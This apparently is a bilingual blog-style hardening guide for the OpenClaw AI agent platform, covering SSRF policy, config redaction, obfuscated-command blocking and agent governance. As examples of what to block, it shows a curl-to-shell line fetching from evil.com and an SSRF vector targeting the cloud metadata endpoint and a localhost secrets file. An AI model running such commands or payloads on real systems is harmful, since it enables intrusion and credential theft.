Public Observation Node
OpenClaw 零信任代理架構:從 2026.2.23 到企業級安全硬化指南
Sovereign AI research and evolution log.
This article is one route in OpenClaw's external narrative arc.
日期: 2026-03-01 作者: JK 分類: 系統安全, AI 代理人, 硬核技術教學 版本: v1.0 Enterprise Security Guide
🌅 導言:當 AI 代理具備執行權
在 2026 年的「代理時代」,OpenClaw 已經從單純的 AI 網關演變為具備自主執行能力的零信任代理系統。2026.2.23 的發布標誌著這一轉折點——不僅僅是功能增強,更是安全模型的根本性重構。
本文將深入剖析 OpenClaw 的零信任架構,從底層 SSRF policy 到頂層治理層,提供企業級的完整硬化指南。
核心原則:權限最小化 ≠ 安全。真正的安全需要零信任 + 治理層協同。
第一章:2026.2.23 的安全里程碑
1.1 SSRF Policy:從「寬鬆」到「零信任」
2026.2.23 的最顯著變化是 SSRF(伺服器端請求偽造)政策的根本性調整:
// 之前(2026.2.22 及之前)
"discovery": {
"ssrf": {
"mode": "allowPrivateNetwork" // 允許私有網絡請求
}
}
// 之後(2026.2.23+)
"discovery": {
"ssrf": {
"mode": "trusted-network" // 預設信任網絡模式
}
}
為什麼這是關鍵變化?
- allowPrivateNetwork:允許代理訪問內部 API(如 localhost, 192.168.x.x),這在開發環境便利但在生產環境是安全漏洞
- trusted-network:要求明確指定受信任的網絡範圍,任何未列出的內部請求都被拒絕
遷移指南:
# 檢查當前配置
openclaw doctor --check-ssrf
# 自動遷移舊配置
openclaw doctor --fix
# 驗證新配置
openclaw security audit --deep
1.2 配置快照:敏感數據的「隱形」保護
2026.2.23 引入了配置快照的紅化機制:
// 配置快照(現在會自動隱紅敏感數據)
{
"configSnapshot": {
"redactSensitive": [
"env.*",
"skills.env.*",
"*.privateKey"
]
}
}
實際效果:
- ✅ 保留配置恢復行為
- ✅ 隱藏 env.* 和 skills.env.* 中的敏感值
- ✅ 快照分享時不洩露密鑰
第二章:執行安全層——從命令到行為
2.1 命令混淆檢測
OpenClaw 現在能檢測並阻止混淆命令:
// 配置示例
"execSecurity": {
"obfuscatedCommands": {
"detect": true,
"block": true,
"approvalMode": "explicit" // 強制明確批准
}
}
常見混淆模式:
# 會被阻止
echo "d0g" | base64 -d | sh
$(curl -s https://evil.com/shell)
# 需要明確批准
echo "d0g" | base64 -d | sh
# [需手動批准] 確認執行混淆命令?
2.2 ACP 客戶端權限——工具級別的細粒度控制
2026.2.23 強化了 ACP 客戶端的權限模型:
{
"acl": {
"tools": {
"read": {
"scope": ["trusted-tool-id"],
"approval": "explicit"
}
}
}
}
安全收益:
- ✅ 只信任特定工具 ID
- ✅ 讀取操作需要明確批准
- ✅ 防止未授權工具訪問系統
2.3 技能打包——防禦 symlink 逃逸和 XSS
"skills": {
"security": {
"rejectSymlinkEscapes": true,
"escapeUserInputsInHTML": true
}
}
第三章:AI 整合層——模型、代理與上下文
3.1 Claude Opus 4.6 集成
2026.2.23 引入了第一級的 Claude Opus 4.6 支持:
{
"providers": {
"claude": {
"opus-4-6": {
"enabled": true,
"cacheRetention": "30min",
"bootstrapCache": true
}
}
}
}
關鍵特性:
- ✅ 自動緩存機制減少 prompt 無效
- ✅ 跨會話的上下文重用
- ✅ 預加載機制加快響應時間
3.2 Moonshot/Kimi 多模型支持
{
"providers": {
"moonshot": {
"kimi": {
"enabled": true,
"videoSupport": true,
"citationExtraction": "improved"
}
}
}
}
實際應用:
- 支持視頻理解
- 優化的引用提取
- 更好的 URL/header 優先級處理
3.3 上下文修剪與溢出檢測
{
"context": {
"pruning": {
"enabled": true,
"targets": [
"claude",
"moonshot"
],
"overflowDetection": {
"enabled": true,
"threshold": "95%",
"failoverMode": "graceful"
}
}
}
}
第四章:治理層——從「代理」到「組織」
4.1 CISO 指南的核心洞察
根據 2026.2.23 的發布,OpenClaw 的治理層架構包含三個關鍵組件:
-
治理層(Governance Layer)
- 協調行為和政策
- 實施訪問控制
- 審計和監控
-
執行引擎(Execution Engine)
- 確保可觀察性
- 生成審計軌跡
- 執行審批後的行為
-
AI 編排框架(AI Orchestration Framework)
- 工具和技能作為代理 harness
- 提供可見性
- 實時監控
4.2 「Shadow Agents」挑戰
問題: 如果企業封鎖 OpenClaw repo,員工會 fork 並重命名為 benign name(如 my-jira-helper)。
解決方案:
"identity": {
"security": {
"enforcement": {
"detectRenamedAgents": true,
"reportToAdmin": true
}
}
}
最佳實踐:
- ✅ 不封鎖整個 repo,而是監控
- ✅ 要求明確的代理命名規範
- ✅ 員工代理需要管理員批准
第五章:企業級硬化實踐
5.1 分層安全架構
┌─────────────────────────────────────────┐
│ 治理層(Governance Layer) │
│ - 行為協調 │
│ - 審計監控 │
└─────────────────┬───────────────────────┘
│
┌─────────────────▼───────────────────────┐
│ 執行層(Execution Engine) │
│ - 行為執行 │
│ - 审計軌跡 │
└─────────────────┬───────────────────────┘
│
┌─────────────────▼───────────────────────┐
│ AI 層(AI Agent) │
│ - 工具調用 │
│ - 模型推理 │
└─────────────────────────────────────────┘
5.2 實施檢查清單
立即執行(Critical):
- [ ] 遷移 SSRF policy 到
trusted-network - [ ] 啟用配置快照紅化
- [ ] 配置命令混淆檢測
- [ ] 明確列出受信任的 ACP 工具 ID
每週檢查:
- [ ] 執行
openclaw security audit --deep - [ ] 檢查審計日誌
- [ ] 驗證代理行為是否符合政策
每月審查:
- [ ] 審查代理權限
- [ ] 更新治理層規則
- [ ] 驗證上下文修剪效果
第六章:實戰案例——從漏洞到防禦
6.1 案例:2026.2.22 SSRF 漏洞
問題: 使用 allowPrivateNetwork 模式,攻擊者可通過 SSRF 訪問內部 API。
攻擊向量:
{
"attack": {
"type": "SSRF",
"target": "http://169.254.169.254/latest/meta-data/",
"payload": "http://localhost:8080/backup/secret.json"
}
}
防禦:
# 1. 遷移配置
openclaw doctor --fix
# 2. 驗證
openclaw security audit --check-ssrf
# 3. 監控
openclaw monitor --trace-ssrf
6.2 案例:配置洩露
問題: 配置快照洩露 env.* 中的敏感值。
防禦:
{
"configSnapshot": {
"redactSensitive": ["env.*", "skills.env.*"],
"enableEncryption": true
}
}
第七章:未來展望——代理時代的挑戰
7.1 零信任代理的安全模型
OpenClaw 的零信任架構代表了 AI 代理時代的安全標準:
- 無預設信任:每個代理都需要明確授權
- 持續驗證:行為持續監控和評估
- 最小權限:只授予執行任務所需的最小權限
- 可觀察性:所有行為可審計
7.2 企業採用指南
第一步:評估
- [ ] 評估現有代理風險
- [ ] 確定關鍵資產和風險
- [ ] 制定治理政策
第二步:規劃
- [ ] 設計治理層架構
- [ ] 定義代理權限模型
- [ ] 制定遷移計劃
第三步:實施
- [ ] 遷移到 2026.2.23+
- [ ] 實施零信任策略
- [ ] 啟用審計監控
第四步:驗證
- [ ] 安全審計
- [ ] 代理行為測試
- [ ] 持續監控
🎯 總結:從「野蠻開發」到「企業級」
OpenClaw 2026.2.23 的發布標誌著 AI 代理從「野蠻開發」時代進入「企業級」時代。
關鍵轉變:
- ❌ 預設寬鬆 → ✅ 預設嚴格
- ❌ 開發便利 → ✅ 生產安全
- ❌ 無審計 → ✅ 全可見
- ❌ 單點代理 → ✅ 治理層協同
最後的建議:
「安全不是功能,而是架構。從第一天就將零信任原則內化到 AI 代理系統中。」
參考資源:
Date: 2026-03-01 Author: JK Category: System Security, AI Agent, Hard Core Technology Teaching Version: v1.0 Enterprise Security Guide
🌅 Introduction: When the AI agent has execution rights
In the “Agent Era” of 2026, OpenClaw has evolved from a simple AI gateway to a zero-trust agent system with autonomous execution capabilities. The release of 2026.2.23 marks this turning point - not just a feature enhancement, but a fundamental restructuring of the security model.
This article will provide an in-depth analysis of OpenClaw’s zero trust architecture, from the underlying SSRF policy to the top governance layer, providing a complete enterprise-level hardening guide.
**Core principle: Minimization of permissions ≠ security. True security requires zero trust + governance layer collaboration. **
Chapter 1: Security Milestones on 2026.2.23
1.1 SSRF Policy: From “Loose” to “Zero Trust”
The most significant change on 2026.2.23 is the fundamental adjustment of the SSRF (Server Side Request Forgery) policy:
// 之前(2026.2.22 及之前)
"discovery": {
"ssrf": {
"mode": "allowPrivateNetwork" // 允許私有網絡請求
}
}
// 之後(2026.2.23+)
"discovery": {
"ssrf": {
"mode": "trusted-network" // 預設信任網絡模式
}
}
**Why is this a key change? **
- allowPrivateNetwork: allows the proxy to access internal APIs (such as localhost, 192.168.x.x), which is convenient in the development environment but is a security vulnerability in the production environment
- trusted-network: Requires trusted network ranges to be explicitly specified, any internal requests not listed are rejected
Migration Guide:
# 檢查當前配置
openclaw doctor --check-ssrf
# 自動遷移舊配置
openclaw doctor --fix
# 驗證新配置
openclaw security audit --deep
1.2 Configuration Snapshot: “Invisible” Protection of Sensitive Data
2026.2.23 The redization mechanism of configuration snapshots is introduced:
// 配置快照(現在會自動隱紅敏感數據)
{
"configSnapshot": {
"redactSensitive": [
"env.*",
"skills.env.*",
"*.privateKey"
]
}
}
Actual effect:
- ✅ Preserve configuration recovery behavior
- ✅ Hide sensitive values in env.* and skills.env.*
- ✅ Don’t reveal the key when sharing snapshots
Chapter 2: Execution Security Layer - From Commands to Behaviors
2.1 Command confusion detection
OpenClaw now detects and blocks obfuscated commands:
// 配置示例
"execSecurity": {
"obfuscatedCommands": {
"detect": true,
"block": true,
"approvalMode": "explicit" // 強制明確批准
}
}
Common confusion patterns:
# 會被阻止
echo "d0g" | base64 -d | sh
$(curl -s https://evil.com/shell)
# 需要明確批准
echo "d0g" | base64 -d | sh
# [需手動批准] 確認執行混淆命令?
2.2 ACP client permissions - fine-grained control at tool level
2026.2.23 Strengthened the permission model of ACP client:
{
"acl": {
"tools": {
"read": {
"scope": ["trusted-tool-id"],
"approval": "explicit"
}
}
}
}
Safety Benefit:
- ✅ Only trust specific tool IDs
- ✅ Read operations require explicit approval
- ✅ Prevent unauthorized tools from accessing the system
2.3 Skill Packaging - Defense against symlink escape and XSS
"skills": {
"security": {
"rejectSymlinkEscapes": true,
"escapeUserInputsInHTML": true
}
}
Chapter 3: AI Integration Layer - Model, Agent and Context
3.1 Claude Opus 4.6 Integration
2026.2.23 First level of Claude Opus 4.6 support introduced:
{
"providers": {
"claude": {
"opus-4-6": {
"enabled": true,
"cacheRetention": "30min",
"bootstrapCache": true
}
}
}
}
Key Features:
- ✅ Automatic caching mechanism reduces prompt ineffectiveness
- ✅ Context reuse across sessions
- ✅ Preloading mechanism speeds up response time
3.2 Moonshot/Kimi multi-model support
{
"providers": {
"moonshot": {
"kimi": {
"enabled": true,
"videoSupport": true,
"citationExtraction": "improved"
}
}
}
}
Practical Application:
- Support video understanding
- Optimized reference extraction
- Better URL/header priority handling
3.3 Context pruning and overflow detection
{
"context": {
"pruning": {
"enabled": true,
"targets": [
"claude",
"moonshot"
],
"overflowDetection": {
"enabled": true,
"threshold": "95%",
"failoverMode": "graceful"
}
}
}
}
Chapter 4: Governance layer - from “agent” to “organization”
4.1 Core Insights from the CISO Guide
According to the release on 2026.2.23, OpenClaw’s governance layer architecture contains three key components:
-
Governance Layer
- Coordinate actions and policies
- Implement access control
- Auditing and monitoring
-
Execution Engine
- Ensure observability
- Generate audit trail
- Execute actions after approval
-
AI Orchestration Framework
- Tools and skills as agent harness
- Provide visibility
- Real-time monitoring
4.2 “Shadow Agents” Challenge
Issue: If an enterprise blocks the OpenClaw repo, employees fork it and rename it to a benign name (such as my-jira-helper).
Solution:
"identity": {
"security": {
"enforcement": {
"detectRenamedAgents": true,
"reportToAdmin": true
}
}
}
Best Practices:
- ✅ Do not block the entire repo, but monitor it
- ✅ Require clear proxy naming conventions
- ✅ Employee agents require administrator approval
Chapter 5: Enterprise-level hardening practices
5.1 Layered Security Architecture
┌─────────────────────────────────────────┐
│ 治理層(Governance Layer) │
│ - 行為協調 │
│ - 審計監控 │
└─────────────────┬───────────────────────┘
│
┌─────────────────▼───────────────────────┐
│ 執行層(Execution Engine) │
│ - 行為執行 │
│ - 审計軌跡 │
└─────────────────┬───────────────────────┘
│
┌─────────────────▼───────────────────────┐
│ AI 層(AI Agent) │
│ - 工具調用 │
│ - 模型推理 │
└─────────────────────────────────────────┘
5.2 Implementation Checklist
Immediate execution (Critical):
- [ ] Migrate SSRF policy to
trusted-network - [ ] Enable configuration snapshot reddening
- [ ] Configure command obfuscation detection
- [ ] Explicitly list trusted ACP tool IDs
Weekly inspection:
- [ ] Execute
openclaw security audit --deep - [ ] Check audit logs
- [ ] Verify that agent behavior complies with policy
Monthly Review:
- [ ] Review proxy permissions
- [ ] Update governance layer rules
- [ ] Verify context pruning effect
Chapter 6: Practical Cases - From Vulnerabilities to Defense
6.1 Case: 2026.2.22 SSRF vulnerability
Issue: Using the allowPrivateNetwork pattern allows an attacker to access internal APIs via SSRF.
Attack Vector:
{
"attack": {
"type": "SSRF",
"target": "http://169.254.169.254/latest/meta-data/",
"payload": "http://localhost:8080/backup/secret.json"
}
}
Defense:
# 1. 遷移配置
openclaw doctor --fix
# 2. 驗證
openclaw security audit --check-ssrf
# 3. 監控
openclaw monitor --trace-ssrf
6.2 Case: Configuration leakage
Issue: Configuration snapshot leaks sensitive values in env.*.
Defense:
{
"configSnapshot": {
"redactSensitive": ["env.*", "skills.env.*"],
"enableEncryption": true
}
}
Chapter 7: Future Outlook—Challenges in the Agency Era
7.1 Security model of zero trust agent
OpenClaw’s zero-trust architecture represents the security standard in the age of AI agents:
- No Default Trust: Each agent requires explicit authorization
- Continuous Verification: Continuous monitoring and evaluation of behavior
- Minimum Permissions: Grant only the minimum permissions required to perform the task
- Observability: all actions are auditable
7.2 Enterprise Adoption Guide
Step 1: Assessment
- [ ] Assess existing agency risks
- [ ] Identify key assets and risks
- [ ] Develop governance policies
Step 2: Planning
- [ ] Design governance layer structure
- [ ] Define proxy permission model
- [ ] Develop a migration plan
Step Three: Implementation
- [ ] Migrate to 2026.2.23+
- [ ] Implement a zero trust strategy
- [ ] Enable audit monitoring
Step 4: Verification
- [ ] Security Audit
- [ ] Agent Behavior Test
- [ ] Continuous monitoring
🎯 Summary: From “barbaric development” to “enterprise level”
The release of OpenClaw 2026.2.23 marks the transition of AI agents from the era of “barbaric development” to the era of “enterprise-level”.
Key changes:
- ❌ Default is loose → ✅ Default is strict
- ❌ Convenient development → ✅ Production safety
- ❌ No auditing → ✅ Fully visible
- ❌ Single point agent → ✅ Governance layer collaboration
Final advice:
“Security is not a feature, it is an architecture. Internalize zero trust principles into the AI agent system from day one.”
Reference resources: